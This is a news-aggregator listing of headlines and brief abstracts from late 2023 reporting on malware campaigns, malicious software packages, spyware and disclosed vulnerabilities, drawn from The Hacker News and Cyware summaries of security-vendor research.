Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023. "Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday. Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components. Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery (TOAD), which involves calling a bogus call center to receive step-by-step instructions for running the app. A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of... The Hacker News
November 29, 2023
200+ Malicious Android Apps Targeting Iranian Banks: Experts Warn Full Text
Abstract
An Android malware campaign targeting Iranian banks has expanded its capabilities and incorporated additional evasion tactics to fly under the radar. That's according to a new report from Zimperium, which discovered more than 200 malicious apps associated with the malicious operation, with the threat actor also observed carrying out phishing attacks against the targeted financial institutions. The campaign first came to light in late July 2023 when Sophos detailed a cluster of 40 credential-harvesting apps targeting customers of Bank Mellat, Bank Saderat, Resalat Bank, and Central Bank of Iran. The primary goal of the bogus apps is to trick victims into granting them extensive permissions as well as harvest banking login credentials and credit card details by abusing Android's accessibility services. "The corresponding legitimate versions of the malicious apps are available at Cafe Bazaar, an Iranian Android marketplace, and have millions of downloads," Sophos... The Hacker News
November 29, 2023
Unveiling the Persisting Threat: Iranian Mobile Banking Malware Campaign Extends Its Reach Full Text
Abstract
The primary goal of the bogus apps is to trick victims into granting them extensive permissions as well as harvest banking login credentials and credit card details by abusing Android's accessibility services. Cyware
November 23, 2023
Alert: New WailingCrab Malware Loader Spreading via Shipping-Themed Emails Full Text
Abstract
Delivery- and shipping-themed email messages are being used to deliver a sophisticated malware loader known as WailingCrab. "The malware itself is split into multiple components, including a loader, injector, downloader and backdoor, and successful requests to C2-controlled servers are often necessary to retrieve the next stage," IBM X-Force researchers Charlotte Hammond, Ole Villadsen, and Kat Metrick said. WailingCrab, also called WikiLoader, was first documented by Proofpoint in August 2023, detailing campaigns targeting Italian organizations that used the malware to ultimately deploy the Ursnif (aka Gozi) trojan. It was spotted in the wild in late December 2022. The malware is the handiwork of a threat actor known as TA544, which is also tracked as Bamboo Spider and Zeus Panda. IBM X-Force has named the cluster Hive0133. Actively maintained by its operators, the malware has been observed incorporating features that prioritize stealth and allow it to resist an... The Hacker News
November 22, 2023
Exploit for Critical Windows Defender Bypass Goes Public
Abstract
A proof-of-concept exploit has been released for a critical zero-day vulnerability in Windows SmartScreen. The vulnerability, identified as CVE-2023-36025, allows attackers to bypass Windows Defender SmartScreen checks and execute malicious code. Cyware
November 21, 2023
New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks
Abstract
A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. "ZPAQ is a file compression format that offers a better compression ratio and journaling function compared to widely used formats like ZIP and RAR," G Data malware analyst Anna Lvova said in a Monday analysis. "That means that ZPAQ archives can be smaller, saving storage space and bandwidth when transferring files. However, ZPAQ has the biggest disadvantage: limited software support." First appearing in 2014, Agent Tesla is a keylogger and remote access trojan (RAT) written in .NET that's offered to other threat actors as part of a malware-as-a-service (MaaS) model. It's often used as a first-stage payload, providing remote access to a compromised system and utilized to download more sophisticated second-stage tools such as ransomware. Agent Tesla is typ ... The Hacker News
November 20, 2023
LummaC2 Malware Deploys New Trigonometry-Based Anti-Sandbox Technique
Abstract
The stealer malware known as LummaC2 (aka Lumma Stealer) now features a new anti-sandbox technique that leverages the mathematical principle of trigonometry to evade detection and exfiltrate valuable information from infected hosts. The method is designed to "delay detonation of the sample until human mouse activity is detected," Outpost24 security researcher Alberto Marín said in a technical report shared with The Hacker News. Written in the C programming language, LummaC2 has been sold in underground forums since December 2022. The malware has since received iterative updates that make it harder to analyze via control flow flattening and even allow it to deliver additional payloads. The current version of LummaC2 (v4.0) also requires its customers to use a crypter as an added concealing mechanism, not to mention prevent it from being leaked in its raw form. Another noteworthy update is the reliance on trigonometry to detect human behavior on the infiltrated ... The Hacker News
November 17, 2023
27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts
Abstract
An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads, Checkmarx said in a new report. A majority of the downloads originated from the U.S., China, France, Hong Kong, Germany, Russia, Ireland, Singapore, the U.K., and Japan. "A defining characteristic of this attack was the utilization of steganography to hide a malicious payload within an innocent-looking image file, which increased the stealthiness of the attack," the software supply chain security firm said. Some of the packages are pyefflorer, pyminor, pyowler, pystallerer, pystob, and pywool, the last of which was planted on May 13, 2023. A common denominator to these packages is t ... The Hacker News
November 15, 2023
New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar
Abstract
Cybersecurity researchers have demonstrated a new technique that exploits a critical security flaw in Apache ActiveMQ to achieve arbitrary code execution in memory. Tracked as CVE-2023-46604 (CVSS score: 10.0), the vulnerability is a remote code execution bug that could permit a threat actor to run arbitrary shell commands. It was patched by Apache in ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 released late last month. The vulnerability has since come under active exploitation by ransomware outfits to deploy ransomware such as HelloKitty and a strain that shares similarities with TellYouThePass as well as a remote access trojan called SparkRAT. According to new findings from VulnCheck, threat actors weaponizing the flaw are relying on a public proof-of-concept (PoC) exploit originally disclosed on October 25, 2023. The attacks have been found to use ClassPathXmlApplicationContext, a class that's part of the Spring framework and available within Active ... The Hacker News
November 13, 2023
CherryBlos Malware Steals Cryptocurrency via Your Photos
Abstract
CherryBlos is a family of Android malware that can steal cryptocurrency by extracting sensitive information from photos on a user's phone. This includes details related to cryptocurrency wallets, such as recovery phrases. Cyware
November 13, 2023
New BiBi-Windows Wiper Targets Windows Systems in Pro-Hamas Attacks
Abstract
Cybersecurity researchers have warned about a Windows version of a wiper malware that was previously observed targeting Linux systems in cyber attacks aimed at Israel. Dubbed BiBi-Windows Wiper by BlackBerry, the wiper is the Windows counterpart of BiBi-Linux Wiper, which has been put to use by a pro-Hamas hacktivist group in the wake of the Israel-Hamas war last month. "The Windows variant [...] confirms that the threat actors who created the wiper are continuing to build out the malware, and indicates an expansion of the attack to target end user machines and application servers," the Canadian company said Friday. Slovak cybersecurity firm is tracking the actor behind the wiper under the name BiBiGun, noting that the Windows variant (bibi.exe) is designed to overwrite data in the C:\Users directory recursively with junk data and appends .BiBi to the filename. The BiBi-Windows Wiper artifact is said to have been compiled on October 21, 2023, two weeks after the ... The Hacker News
November 10, 2023
Stealthy Kamran Spyware Targeting Urdu-speaking Users in Gilgit-Baltistan
Abstract
Urdu-speaking readers of a regional news website that caters to the Gilgit-Baltistan region have likely emerged as a target of a watering hole attack designed to deliver a previously undocumented Android spyware dubbed Kamran. The campaign, ESET has discovered, leverages Hunza News (urdu.hunzanews[.]net), which, when opened on a mobile device, prompts visitors of the Urdu version to install its Android app directly hosted on the website. The app, however, incorporates malicious espionage capabilities, with the attack compromising at least 20 mobile devices to date. It has been available on the website since sometime between January 7 and March 21, 2023, around when massive protests were held in the region over land rights, taxation, and extensive power cuts. The malware, activated upon package installation, requests intrusive permissions, allowing it to harvest sensitive information from the devices. This includes contacts, call logs, calendar events, location informa ... The Hacker News
November 09, 2023
New Malvertising Campaign Uses Fake Windows News Portal to Distribute Malicious Installers
Abstract
A new malvertising campaign has been found to employ fake sites that masquerade as a legitimate Windows news portal to propagate a malicious installer for a popular system profiling tool called CPU-Z. "This incident is a part of a larger malvertising campaign that targets other utilities like Notepad++, Citrix, and VNC Viewer as seen in its infrastructure (domain names) and cloaking templates used to avoid detection," Malwarebytes' Jérôme Segura said. While malvertising campaigns are known to set up replica sites advertising widely-used software, the latest activity marks a deviation in that the website mimics WindowsReport[.]com. The goal is to trick unsuspecting users searching for CPU-Z on search engines like Google by serving malicious ads that, when clicked, redirect them to the fake portal (workspace-app[.]online). At the same time, users who are not the intended victims of the campaign are served an innocuous blog with different articles, a technique known a ... The Hacker News
November 9, 2023
New BlazeStealer Malware in PyPI Targets Developers
Abstract
A new set of malicious Python packages has been discovered on the Python Package Index (PyPI) repository. These packages masquerade as harmless obfuscation tools but contain a malware called BlazeStealer. The campaign started in January 2023 and includes eight packages. Developers must stay ale ... Cyware
November 09, 2023
MuddyC2Go: New C2 Framework Iranian Hackers Using Against Israel
Abstract
Iranian nation-state actors have been observed using a previously undocumented command-and-control (C2) framework called MuddyC2Go as part of attacks targeting Israel. "The framework's web component is written in the Go programming language," Deep Instinct security researcher Simon Kenin said in a technical report published Wednesday. The tool has been attributed to MuddyWater, an Iranian state-sponsored hacking crew that's affiliated to the country's Ministry of Intelligence and Security (MOIS). The cybersecurity firm said the C2 framework may have been put to use by the threat actor since early 2020, with recent attacks leveraging it in place of PhonyC2, another custom C2 platform from MuddyWater that came to light in June 2023 and has had its source code leaked. Typical attack sequences observed over the years have involved sending spear-phishing emails bearing malware-laced archives or bogus links that lead to the deployment of legitimate ... The Hacker News
November 08, 2023
Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI
Abstract
A new set of malicious Python packages have slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News. "[BlazeStealer] retrieves an additional malicious script from an external source, enabling a Discord bot that gives attackers complete control over the victim's computer," security researcher Yehuda Gelb said. The campaign, which commenced in January 2023, entails a total of eight packages named Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood, the last of which was published in October. These modules come with setup.py and init.py files that are designed to retrieve a Python script hosted on transfer[.]sh, which gets executed immediately upon ... The Hacker News
November 07, 2023
New GootLoader Malware Variant Evades Detection and Spreads Rapidly
Abstract
A new variant of the GootLoader malware called GootBot has been found to facilitate lateral movement on compromised systems and evade detection. "The GootLoader group's introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2 such as CobaltStrike or RDP," IBM X-Force researchers Golo Mühr and Ole Villadsen said. "This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads." GootLoader, as the name implies, is a malware capable of downloading next-stage malware after luring potential victims using search engine optimization (SEO) poisoning tactics. It's linked to a threat actor tracked as Hive0127 (aka UNC2565). The use of GootBot points to a tactical shift, with the implant downloaded as a payload after a Gootloader infection in lieu of post-exploitation frameworks such ... The Hacker News
November 06, 2023
New Jupyter Infostealer Version Emerges with Sophisticated Stealth Tactics
Abstract
An updated version of an information stealer malware known as Jupyter has resurfaced with "simple yet impactful changes" that aim to stealthily establish a persistent foothold on compromised systems. "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file," VMware Carbon Black researchers said in a report shared with The Hacker News. Jupyter Infostealer, also known as Polazert, SolarMarker, and Yellow Cockatoo, has a track record of leveraging manipulated search engine optimization (SEO) tactics and malvertising as an initial access vector to trick users searching for popular software into downloading it from dubious websites. It comes with capabilities to harvest credentials as well as establish encrypted command-and-control (C2) communication to exfiltrate data and execute arbitrary commands. The late ... The Hacker News
November 06, 2023
SecuriDropper: New Android Dropper-as-a-Service Bypasses Google’s Defenses
Abstract
Cybersecurity researchers have shed light on a new dropper-as-a-service (DaaS) for Android called SecuriDropper that bypasses new security restrictions imposed by Google and delivers the malware. Dropper malware on Android is designed to function as a conduit to install a payload on a compromised device, making it a lucrative business model for threat actors, who can advertise the capabilities to other criminal groups. What's more, doing so also allows adversaries to separate the development and execution of an attack from the installation of the malware. "Droppers and the actors behind them are in a constant state of evolution as they strive to outwit evolving security measures," Dutch cybersecurity firm ThreatFabric said in a report shared with The Hacker News. One such security measure introduced by Google with Android 13 is what's called the Restricted Settings, which prevents sideloaded applications from obtaining Accessibility and Notification Listener ... The Hacker News
November 04, 2023
StripedFly Malware Operated Unnoticed for 5 Years, Infecting 1 Million Devices
Abstract
An advanced strain of malware masquerading as a cryptocurrency miner has managed to fly under the radar for over five years, infecting no less than one million devices around the world in the process. That's according to findings from Kaspersky, which has codenamed the threat StripedFly, describing it as an "intricate modular framework that supports both Linux and Windows." The Russian cybersecurity vendor, which first detected the samples in 2017, said the miner is part of a much larger entity that employs a custom EternalBlue SMBv1 exploit attributed to the Equation Group in order to infiltrate publicly-accessible systems. The malicious shellcode, delivered via the exploit, has the ability to download binary files from a remote Bitbucket repository as well as execute PowerShell scripts. It also supports a collection of plugin-like expandable features to harvest sensitive data and even uninstall itself. The platform's shellcode is injected in the wininit.exe proc ... The Hacker News
November 03, 2023
NodeStealer Malware Hijacking Facebook Business Accounts for Malicious Ads
Abstract
Compromised Facebook business accounts are being used to run bogus ads that employ "revealing photos of young women" as lures to trick victims into downloading an updated version of a malware called NodeStealer. "Clicking on ads immediately downloads an archive containing a malicious .exe 'Photo Album' file which also drops a second executable written in .NET – this payload is in charge of stealing browser cookies and passwords," Bitdefender said in a report published this week. NodeStealer was first disclosed by Meta in May 2023 as a JavaScript malware designed to facilitate the takeover of Facebook accounts. Since then, the threat actors behind the operation have leveraged a Python-based variant in their attacks. The malware is part of a burgeoning cybercrime ecosystem in Vietnam, where multiple threat actors are leveraging overlapping methods that primarily involve advertising-as-a-vector on Facebook for propagation. The latest campaign disc ... The Hacker News
November 3, 2023
Unmasking New AsyncRAT Infection Chain
Abstract
AsyncRAT is being distributed through a malicious HTML file and uses various file types like PowerShell, WSF, and VBScript to bypass detection. The infection chain begins with a spam email containing a malicious URL to download the HTML file. Cyware
November 3, 2023
New DarkGate Variant Uses a New Loading Approach
Abstract
DarkGate is a versatile malware that includes features such as keylogging, information stealing, and downloading and executing other payloads. The DarkGate malware has been involved in multiple campaigns and continues to evolve. Cyware
November 03, 2023
48 Malicious npm Packages Found Deploying Reverse Shells on Developer Systems
Abstract
A new set of 48 malicious npm packages has been discovered in the npm repository with capabilities to deploy a reverse shell on compromised systems. "These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate a reverse shell on package install," software supply chain security firm Phylum said. All the counterfeit packages have been published by an npm user named hktalent (GitHub, X). As of writing, 39 of the packages uploaded by the author are still available for download. The attack chain is triggered after the installation of the package via an install hook in the package.json that calls a JavaScript code to establish a reverse shell to rsh.51pwn[.]com. "In this particular case, the attacker published dozens of benign-sounding packages with several layers of obfuscation and deceptive tactics in an attempt to ultimately deploy a reverse shell on any machine that simply installs one of these packages," ... The Hacker News
November 1, 2023
Dozens of Kernel Drivers Allow Attackers to Alter Firmware, Escalate Privileges
Abstract
VMware Carbon Black's Threat Analysis Unit (TAU) has discovered numerous previously unknown vulnerable kernel drivers that could be exploited by hackers to modify firmware or gain elevated privileges. Cyware
November 01, 2023
Turla Updates Kazuar Backdoor with Advanced Anti-Analysis to Evade Detection
Abstract
The Russia-linked hacking crew known as Turla has been observed using an updated version of a known second-stage backdoor referred to as Kazuar. The new findings come from Palo Alto Networks Unit 42, which is tracking the adversary under its constellation-themed moniker Pensive Ursa. "As the code of the upgraded revision of Kazuar reveals, the authors put special emphasis on Kazuar's ability to operate in stealth, evade detection and thwart analysis efforts," security researchers Daniel Frank and Tom Fakterman said in a technical report. "They do so using a variety of advanced anti-analysis techniques and by protecting the malware code with effective encryption and obfuscation practices." Pensive Ursa, active since at least 2004, is attributed to the Russian Federal Security Service (FSB). Earlier this July, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated the threat group in attacks targeting the defense sector in Ukraine and East ... The Hacker News
November 1, 2023
Malware ‘Meal Kits’ Serve Up No-Fuss RAT Attacks
Abstract
The Parallax RAT has seen a significant increase in usage, particularly through infected DLLs in seemingly legitimate invoices, making it harder for users to detect the attack. Cyware
October 31, 2023
Malicious NuGet Packages Exploit Loophole in MSBuild Integrations
Abstract
Cybersecurity firm ReversingLabs has discovered a coordinated and ongoing malicious campaign on the NuGet package manager. The campaign involves the publishing of hundreds of malicious packages since August. Cyware
October 31, 2023
Malicious NuGet Packages Caught Distributing SeroXen RAT Malware
Abstract
Cybersecurity researchers have uncovered a new set of malicious packages published to the NuGet package manager using a lesser-known method for malware deployment. Software supply chain security firm ReversingLabs described the campaign as coordinated and ongoing since August 1, 2023, while linking it to a host of rogue NuGet packages that were observed delivering a remote access trojan called SeroXen RAT. "The threat actors behind it are tenacious in their desire to plant malware into the NuGet repository, and to continuously publish new malicious packages," Karlo Zanki, reverse engineer at ReversingLabs, said in a report shared with The Hacker News. The names of some of the packages are below - Pathoschild.Stardew.Mod.Build.Config, KucoinExchange.Net, Kraken.Exchange, DiscordsRpc, SolanaWallet, Monero, Modern.Winform.UI, MinecraftPocket.Server, IAmRoot, ZendeskApi.Client.V2, Betalgo.Open.AI, Forge.Open.AI, Pathoschild.Stardew.Mod.BuildConfig, CData.NetSuite.Net. ... The Hacker News
October 31, 2023
Arid Viper Disguising Mobile Spyware as Updates for Non-Malicious Android Applications
Abstract
The malware used by Arid Viper shares similarities with a non-malicious dating app called Skipped, indicating a possible connection between the APT group and the app's developers. Cyware
October 26, 2023
iLeakage: New Safari Exploit Impacts Apple iPhones and Macs with A and M-Series CPUs
Abstract
A group of academics has devised a novel side-channel attack dubbed iLeakage that exploits a weakness in the A- and M-series CPUs running on Apple iOS, iPadOS, and macOS devices, enabling the extraction of sensitive information from the Safari web browser. "An attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution," researchers Jason Kim, Stephan van Schaik, Daniel Genkin, and Yuval Yarom said in a new study. In a practical attack scenario, the weakness could be exploited using a malicious web page to recover Gmail inbox content and even recover passwords that are autofilled by credential managers. iLeakage, besides being the first case of a Spectre-style speculative execution attack against Apple Silicon CPUs, also works against all third-party web browsers available for iOS and iPadOS owing to Apple's App Store policy that mandates browser vendors to use Safari ... The Hacker News
October 24, 2023
Backdoor Implant on Hacked Cisco Devices Modified to Evade Detection
Abstract
The backdoor implanted on Cisco devices by exploiting a pair of zero-day flaws in IOS XE software has been modified by the threat actor so as to escape visibility via previous fingerprinting methods. "Investigated network traffic to a compromised device has shown that the threat actor has upgraded the implant to do an extra header check," NCC Group's Fox-IT team said. "Thus, for a lot of devices, the implant is still active, but now only responds if the correct Authorization HTTP header is set." The attacks entail fashioning CVE-2023-20198 (CVSS score: 10.0) and CVE-2023-20273 (CVSS score: 7.2) into an exploit chain that grants the threat actor the ability to gain access to the devices, create a privileged account, and ultimately deploy a Lua-based implant on the devices. The development comes as Cisco began rolling out security updates to address the issues, with more updates to come at an as-yet-undisclosed date. The exact identity of the threat ... The Hacker News
October 23, 2023
From Copacabana to Barcelona: The Cross-Continental Threat of Brazilian Banking Malware
Abstract
Proofpoint researchers have discovered a new version of the Grandoreiro malware that is targeting victims in both Mexico and Spain. This is unusual as the malware has historically only targeted Portuguese and Spanish speakers in Brazil and Mexico. Cyware
October 23, 2023
Quasar RAT Employs DLL Sideloading to Stay Under the Radar
Abstract
Quasar RAT, an open-source remote access trojan also known as CinaRAT or Yggdrasil, has been spotted leveraging a new Microsoft file as part of its DLL sideloading process to stealthily drop malicious payloads on compromised Windows systems. Once the Quasar RAT payload is executed in the computer' ... Cyware
October 23, 2023
Quasar RAT Leverages DLL Side-Loading to Fly Under the Radar
Abstract
The open-source remote access trojan known as Quasar RAT has been observed leveraging DLL side-loading to fly under the radar and stealthily siphon data from compromised Windows hosts. "This technique capitalizes on the inherent trust these files command within the Windows environment," Uptycs researchers Tejaswini Sandapolla and Karthickkumar Kathiresan said in a report published last week, detailing the malware's reliance on ctfmon.exe and calc.exe as part of the attack chain. Also known by the names CinaRAT or Yggdrasil, Quasar RAT is a C#-based remote administration tool capable of gathering system information, a list of running applications, files, keystrokes, screenshots, and executing arbitrary shell commands. DLL side-loading is a popular technique adopted by many threat actors to execute their own payloads by planting a spoofed DLL file with a name that a benign executable is known to be looking for. "Adversaries likely use side-loading as a ... The Hacker News
October 20, 2023
ExelaStealer: A New Low-Cost Cybercrime Weapon Emerges
Abstract
A new information stealer named ExelaStealer has become the latest entrant to an already crowded landscape filled with various off-the-shelf malware designed to capture sensitive data from compromised Windows systems. "ExelaStealer is a largely open-source infostealer with paid customizations available from the threat actor," Fortinet FortiGuard Labs researcher James Slaughter said in a technical report. Written in Python and incorporating support for JavaScript, it comes fitted with capabilities to siphon passwords, Discord tokens, credit cards, cookies and session data, keystrokes, screenshots, and clipboard content. ExelaStealer is offered for sale via cybercrime forums as well as a dedicated Telegram channel set up by its operators who go by the online alias quicaxd. The paid-for version costs $20 a month, $45 for three months, or $120 for a lifetime license. The low cost of the commodity malware makes it a perfect hacking tool for newbies, effectively lowerin ... The Hacker News
October 17, 2023
Researchers Warn of Increased Malware Delivery via Fake Browser Updates
Abstract
The threat group behind the SocGholish campaigns is likely responsible for the ClearFake malware delivery campaign, which uses compromised WordPress sites to push malicious fake browser updates. Cyware
October 16, 2023
SpyNote: Beware of This Android Trojan that Records Audio and Phone Calls
Abstract
The Android banking trojan known as SpyNote has been dissected to reveal its diverse information-gathering features. Typically spread via SMS phishing campaigns, attack chains involving the spyware trick potential victims into installing the app by clicking on the embedded link, according to F-Secure. Besides requesting invasive permissions to access call logs, camera, SMS messages, and external storage, SpyNote is known for hiding its presence from the Android home screen and the Recents screen in a bid to avoid detection. "The SpyNote malware app can be launched via an external trigger," F-Secure researcher Amit Tambe said in an analysis published last week. "Upon receiving the intent, the malware app launches the main activity." But most importantly, it seeks accessibility permissions, subsequently leveraging it to grant itself additional permissions to record audio and phone calls, log keystrokes, as well as capture screenshots o ... The Hacker News
October 14, 2023
“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart Contracts
Abstract
A new malware campaign called "EtherHiding" has emerged, using BSC contracts to host parts of a malicious code chain. The campaign starts by hijacking WordPress sites and tricking users into downloading fake browser updates that are actually malware. Cyware
October 13, 2023
DarkGate Malware Spreading via Messaging Services Posing as PDF Files
Abstract
A piece of malware known as DarkGate has been observed being spread via instant messaging platforms such as Skype and Microsoft Teams. In these attacks, the messaging apps are used to deliver a Visual Basic for Applications (VBA) loader script that masquerades as a PDF document, which, when opened, triggers the download and execution of an AutoIt script designed to launch the malware. "It's unclear how the originating accounts of the instant messaging applications were compromised, however it is hypothesized to be either through leaked credentials available through underground forums or the previous compromise of the parent organization," Trend Micro said in a new analysis published Thursday. DarkGate, first documented by Fortinet in November 2018, is a commodity malware that incorporates a wide range of features to harvest sensitive data from web browsers, conduct cryptocurrency mining, and allow its operators to remotely control the infected hosts. It also ... The Hacker News
October 12, 2023
Malicious NuGet Package Targeting .NET Developers with SeroXen RAT
Abstract
A malicious package hosted on the NuGet package manager for the .NET Framework has been found to deliver a remote access trojan called SeroXen RAT. The package, named Pathoschild.Stardew.Mod.Build.Config and published by a user named Disti, is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig, software supply chain security firm Phylum said in a report today. While the real package has received nearly 79,000 downloads to date, the malicious variant is said to have artificially inflated its download count after being published on October 6, 2023, to surpass 100,000 downloads. The profile behind the package has published six other packages that have attracted no less than 2.1 million downloads cumulatively, four of which masquerade as libraries for various crypto services like Kraken, KuCoin, Solana, and Monero, but are also designed to deploy SeroXen RAT. The attack chain is initiated during installation of the package by means of a tools/init.ps1 ... The Hacker News
October 12, 2023
Researchers Discover SeroXen RAT in Typosquatted NuGet Package
Abstract
The package contains a malicious install script that executes covertly during installation, downloading an obfuscated batch script that ultimately constructs and executes a PowerShell script. Cyware
October 12, 2023
Researchers Uncover Malware Posing as WordPress Caching Plugin
Abstract
Cybersecurity researchers have shed light on a new sophisticated strain of malware that masquerades as a WordPress plugin to stealthily create administrator accounts and remotely control a compromised site. "Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list of activated plugins, and has pinging functionality that allows a malicious actor to check if the script is still operational, as well as file modification capabilities," Wordfence said. The plugin also offers the ability to activate and deactivate arbitrary plugins on the site remotely as well as create rogue admin accounts with the username superadmin and a hard-coded password. In what's seen as an attempt to erase traces of compromise, it features a function named "_pln_cmd_hide" that's designed to remove the superadmin account when it's no longer requir ... The Hacker News
October 05, 2023
Analysis and Config Extraction of Lu0Bot, a Node.js Malware with Considerable Capabilities Full Text
Abstract
Nowadays, more malware developers are using unconventional programming languages to bypass advanced detection systems. The Node.js malware Lu0Bot is a testament to this trend. By targeting a platform-agnostic runtime environment common in modern web apps and employing multi-layer obfuscation, Lu0Bot is a serious threat to organizations and individuals. Although the malware currently has low activity, the attackers are likely waiting for the right moment to strike. To be prepared for any future scenario, a team of analysts conducted an in-depth technical analysis of one of the recent samples of Lu0Bot and published an article documenting their process. Here's an overview of their research. Static analysis of the Lu0Bot sample: The sample under investigation used an SFX packer, a self-extracting archive that can be opened with any archive utility. Its contents were explored individually. Archive contents: 1. BAT-file. The content of the BAT file: The first line in the ... (The Hacker News)
October 05, 2023
GoldDigger Android Trojan Targets Banking Apps in Asia Pacific Countries Full Text
Abstract
A new Android banking trojan named GoldDigger has been found targeting several financial applications with an aim to siphon victims' funds and backdoor infected devices. "The malware targets more than 50 Vietnamese banking, e-wallet and crypto wallet applications," Group-IB said. "There are indications that this threat might be poised to extend its reach across the wider APAC region and to Spanish-speaking countries." The malware was first detected by the Singapore-headquartered company in August 2023, although there is evidence to suggest that it has been active since June 2023. While the exact scale of the infections is currently not known, the malicious apps have been found to impersonate a Vietnamese government portal and an energy company to request intrusive permissions to meet its data-gathering goals. This primarily includes abusing Android's accessibility services, which is intended to assist users with disabilities to use the apps, in ... (The Hacker News)
October 5, 2023
Attacker Deployed Hundreds of Rogue Python Packages with 75,000 Downloads to Steal Sensitive Data Full Text
Abstract
The malicious packages aim to steal sensitive data from systems, applications, browsers, and users. They also target cryptocurrency users by redirecting transactions to the attacker's account. (Cyware)
October 4, 2023
Mozilla Warns of Fake Thunderbird Downloads Delivering Ransomware Full Text
Abstract
The Snatch cybercrime group has been using paid Google ads to distribute their malware, posing as trusted software like Adobe Reader, Discord, Microsoft Teams, and Mozilla Thunderbird. (Cyware)
October 04, 2023
Researchers Link DragonEgg Android Spyware to LightSpy iOS Surveillanceware Full Text
Abstract
New findings have identified connections between an Android spyware called DragonEgg and another sophisticated modular iOS surveillanceware tool named LightSpy. DragonEgg, alongside WyrmSpy (aka AndroidControl), was first disclosed by Lookout in July 2023 as a strain of malware capable of gathering sensitive data from Android devices. It was attributed to the Chinese nation-state group APT41. On the other hand, details about LightSpy came to light in March 2020 as part of a campaign dubbed Operation Poisoned News in which Apple iPhone users in Hong Kong were targeted with watering hole attacks to install the spyware. Now, according to Dutch mobile security firm ThreatFabric, the attack chains involve the use of a trojanized Telegram app that's designed to download a second-stage payload (smallmload.jar), which, in turn, is configured to download a third component codenamed Core. Further analysis of the artifacts has revealed that the implant has been actively maintaine ... (The Hacker News)
October 04, 2023
Rogue npm Package Deploys Open-Source Rootkit in New Supply Chain Attack Full Text
Abstract
A new deceptive package hidden within the npm package registry has been uncovered deploying an open-source rootkit called r77, marking the first time a rogue package has delivered rootkit functionality. The package in question is node-hide-console-windows, which mimics the legitimate npm package node-hide-console-window in what's an instance of a typosquatting campaign. It was downloaded 704 times over the past two months before it was taken down. ReversingLabs, which first detected the activity in August 2023, said the package "downloaded a Discord bot that facilitated the planting of an open-source rootkit, r77," adding it "suggests that open-source projects may increasingly be seen as an avenue by which to distribute malware." The malicious code, per the software supply chain security firm, is contained within the package's index.js file that, upon execution, fetches an executable that's automatically run. The executable in question is ... (The Hacker News)
October 03, 2023
Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers Full Text
Abstract
Nearly three dozen counterfeit packages have been discovered in the npm package repository that are designed to exfiltrate sensitive data from developer systems, according to findings from Fortinet FortiGuard Labs. One set of packages – named @expue/webpack, @expue/core, @expue/vue3-renderer, @fixedwidthtable/fixedwidthtable, and @virtualsearchtable/virtualsearchtable – harbored an obfuscated JavaScript file that's capable of gathering valuable secrets. This includes Kubernetes configurations, SSH keys, and system metadata such as username, IP address, and hostname. The cybersecurity firm said it also discovered another collection of four modules, i.e., binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate, which results in the unauthorized extraction of source code and configuration files. "The targeted files and directories may contain highly valuable intellectual property and sensitive information, such as various application and service credent ... (The Hacker News)
October 02, 2023
BunnyLoader: New Malware-as-a-Service Threat Emerges in the Cybercrime Underground Full Text
Abstract
Cybersecurity experts have discovered yet another malware-as-a-service (MaaS) threat called BunnyLoader that's being advertised for sale on the cybercrime underground. "BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more," Zscaler ThreatLabz researchers Niraj Shivtarkar and Satyam Singh said in an analysis published last week. Its other capabilities include running remote commands on the infected machine, a keylogger to capture keystrokes, and a clipper functionality to monitor the victim's clipboard and replace content matching cryptocurrency wallet addresses with actor-controlled addresses. A C/C++-based loader offered for $250 for a lifetime license, the malware is said to have been under continuous development since its debut on September 4, 2023, with new features and enhancements that incorporate anti-sandbox and antivirus evasion ... (The Hacker News)
October 02, 2023
Zanubis Android Banking Trojan Poses as Peruvian Government App to Target Users Full Text
Abstract
